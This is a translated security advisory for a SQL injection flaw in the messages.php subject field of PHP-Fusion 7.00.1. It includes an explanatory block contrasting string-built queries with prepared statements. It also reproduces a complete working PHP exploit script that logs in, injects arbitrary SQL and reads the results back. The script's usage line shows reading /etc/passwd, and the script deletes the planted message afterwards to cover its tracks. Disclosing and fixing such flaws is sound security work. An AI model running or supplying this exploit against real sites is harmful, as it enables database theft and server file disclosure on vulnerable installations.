PHP-Fusion messages.php Module SQL Injection Vulnerability

Release date: 2008-11-20
Update date: 2008-11-25

Affected systems:
PHP-Fusion PHP-Fusion 7.00.1
Description:
BUGTRAQ ID: 32388

PHP-Fusion is a PHP-based content management system.

When send_message is set to Send, the messages.php file in PHP-Fusion uses the subject parameter in an SQL query without properly validating the input, which allows a remote attacker to perform SQL injection by submitting a malicious request.
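The defect class described above, shown as an added illustration that is not PHP-Fusion's own code: a hypothetical message-insert query built by string interpolation beside a hardened version that uses a mysqli prepared statement, plus the input checks that belong in front of either. The table and column names, the function names and the sample inputs are assumptions chosen for the example.

```php
<?php
// Added example, not PHP-Fusion's code. Table/column names, function names and
// the sample inputs below are assumptions chosen for illustration only.

// Vulnerable pattern: the user-supplied subject is interpolated into the SQL
// text. A subject containing a quote or a comment sequence changes the
// structure of the statement instead of being stored as data.
function build_insert_unsafe(int $fromId, int $toId, string $subject, string $message): string
{
    return "INSERT INTO messages (message_from, message_to, message_subject, message_message) "
         . "VALUES ({$fromId}, {$toId}, '{$subject}', '{$message}')";
}

// Hardened pattern: a prepared statement with bound parameters. The SQL text is
// fixed at prepare time; the subject travels to the server as a value, so
// quotes and comment sequences in it are stored literally.
function insert_message_safe(mysqli $db, int $fromId, int $toId, string $subject, string $message): bool
{
    $stmt = $db->prepare(
        "INSERT INTO messages (message_from, message_to, message_subject, message_message) "
      . "VALUES (?, ?, ?, ?)"
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    // 'iiss': two integers followed by two strings.
    $stmt->bind_param('iiss', $fromId, $toId, $subject, $message);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

// Defence in depth, placed in front of the query regardless of how it is
// built: the recipient id must be a positive integer (the advisory's exploit
// sends msg_send as a string), and the subject must be non-empty and bounded.
function valid_recipient($msgSend): bool
{
    return filter_var($msgSend, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]) !== false;
}

function valid_subject(string $subject): bool
{
    $subject = trim($subject);
    return $subject !== '' && strlen($subject) <= 100;
}

// Demonstration on constructed input; the unsafe builder needs no database.
$benign  = "Meeting on Friday";
$hostile = "x', 'y')/*";   // constructed: a quote followed by a comment opener
echo build_insert_unsafe(1, 2, $benign, 'see you there'), PHP_EOL;
echo build_insert_unsafe(1, 2, $hostile, 'see you there'), PHP_EOL;
// The second statement closes the VALUES list after 'y' and comments out the
// remainder, which is how unvalidated subject text reaches the database as SQL.
var_dump(valid_recipient("12"));        // bool(true)
var_dump(valid_recipient("12'/*xxx"));  // bool(false)
var_dump(valid_subject($benign));       // bool(true)
```

The prepared statement is the actual fix; the validation functions only narrow what reaches the query and would not, on their own, make the concatenated form safe. Note also that the exploit's stated precondition, magic_quotes being off, is not a defence to rely on: magic_quotes_gpc was removed from PHP in 5.4, so any code that still depends on it is injectable on current PHP regardless of configuration.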

<*Source: irk4z (irk4z@yahoo.pl)
  
  Link: http://secunia.com/advisories/32781/
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

<?php
/*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit
requires magic_quotes == off

coded by irk4z[at]yahoo.pl
homepage: http://irk4z.wordpress.com

greets: all friends ;)
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*/

$host = $argv[1];
$path = $argv[2];
$login = $argv[3];
$pass = $argv[4];
$sql_injection = $argv[5];

echo
"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n".
" PHP-Fusion 7.00.1 (messages.php) Remote SQL Injection Exploit\n".
" requires magic_quotes == off\n".
"\n".
" coded by irk4z[at]yahoo.pl\n".
" homepage: http://irk4z.wordpress.com\n".
"\n".
" greets: all friends ;)\n".
"*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*\n";

if(empty($host) || empty($path) || empty($login) || empty($pass) || empty($sql_injection) ){
    echo "Usage: php $argv[0] <host> <path> <login> <pass> <SQL>\n" .
         "       php $argv[0] localhost /php-fusion/ user s3cret \"SELECT database()\"\n".
         "       php $argv[0] localhost / user s3cret \"SELECT load_file(0x2F6574632F706173737764)\"\n\n";
    die;
}

echo "Logging into system...";
//login to php-fusion using login and pass
$login_data = send($host, array(    "path" => $path."news.php",
                    "post" => array(
                            "user_name" => $login,
                            "user_pass" => $pass,
                            "login" => "Login"
                            )
                )
            );

//get cookies
preg_match_all("/Set-Cookie:[\s]+([a-z_A-Z0-9]+=[a-z_A-Z0-9\.]+;)/", $login_data, $matches);
$cookies = implode(' ', $matches[1]);

//get user id
preg_match_all("/([0-9])+.([a-zA-Z0-9]{32})/", $cookies, $matches);
$my_id = $matches[1][0];

if(empty($my_id)){
    echo "\n[x] Incorrect login or password..";
    die;
} else {
    echo "[ok]\n";
}

$id_message = uniqid();
$inhex = '';
for($i = 0; $i < strlen($id_message); $i++) $inhex .= dechex( ord($id_message[$i]) ) ;

echo "Running sql-injection...\n";
//running sql-injection
$res = send($host, array(    "path" => $path."messages.php?msg_send={$my_id}%27%2F%2Axxx&",
                "cookie" => $cookies,
                "post" => array(
                        "send_message" => 'X',
                        "subject" => "X*/,0x{$inhex},                                (SELECT/**/concat(0x{$inhex}{$inhex},hex(($sql_injection)),0x{$inhex}{$inhex})),0x79,1,1226787120,1)/*",
                        "message" => "XXX"
                        )
            )
        );

echo "Getting data...\n\n";
$res = send($host, array(    "path" => $path."messages.php?folder=outbox",
                "cookie" => $cookies )
            );

preg_match_all("/msg_read=([0-9]+)'>{$id_message}<\/a>/", $res, $matches);
$id_message_number = $matches[1][0];

$res = send($host, array(    "path" => $path."messages.php?folder=outbox&msg_read=".$id_message_number,
                "cookie" => $cookies )
        );

preg_match_all("/{$id_message}{$id_message}(.*){$id_message}{$id_message}/", $res, $matches);

if( empty($matches[1][0]) ){
    echo "[x] Failed... maybe SQL-INJ is incorrect?\n\n";
} else {
    $tmp = '';
    $hex = $matches[1][0];
    //unhex it!
    for($i = 0; $i < strlen($hex); $i+=2) $tmp .= chr(hexdec($hex[$i] . $hex[$i+1]));
    echo "DATA: \n".$tmp."\n\n";
}

echo "Deleting message...\n";

$res = send($host, array(    "path" => $path."messages.php?folder=outbox&msg_id=".$id_message_number,
                "cookie" => $cookies,
                "post" => array (
                        "delete" => "Delete"
                        )
            )
        );

//send http packet
function send($host, $dane = "") {
    $packet = (empty($dane['post']) ? "GET" : "POST") . " {$dane["path"]} HTTP/1.1\r\n";
    $packet .= "Host: {$host}\r\n";
    
    if( !empty($dane['cookie']) ){
        $packet .= "Cookie: {$dane['cookie']}\r\n";
    }
    
    if( !empty($dane['post']) ){
        $reszta_syfu = "";
        foreach($dane['post'] as $tmp => $tmp2){
            $reszta_syfu .= $tmp . "=" . $tmp2 . "&";
        }
        $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $packet .= "Connection: Close\r\n";
        $packet .= "Content-Length: ".strlen($reszta_syfu)."\r\n\r\n";
        $packet .= $reszta_syfu;
    } else {
        $packet .= "Connection: Close\r\n\r\n";
    }

    $o = @fsockopen($host, 80);
    if(!$o){
        echo "\n[x] No response...\n";
        die;
    }
    fputs($o, $packet);
    $ret = '';
    while (!feof($o)) $ret .= fread($o, 1024);
    fclose($o);
    return ($ret);
}

?>

Recommendation:
Vendor patch:

PHP-Fusion
----------
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:

http://sourceforge.net/projects/php-fusion/

This advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.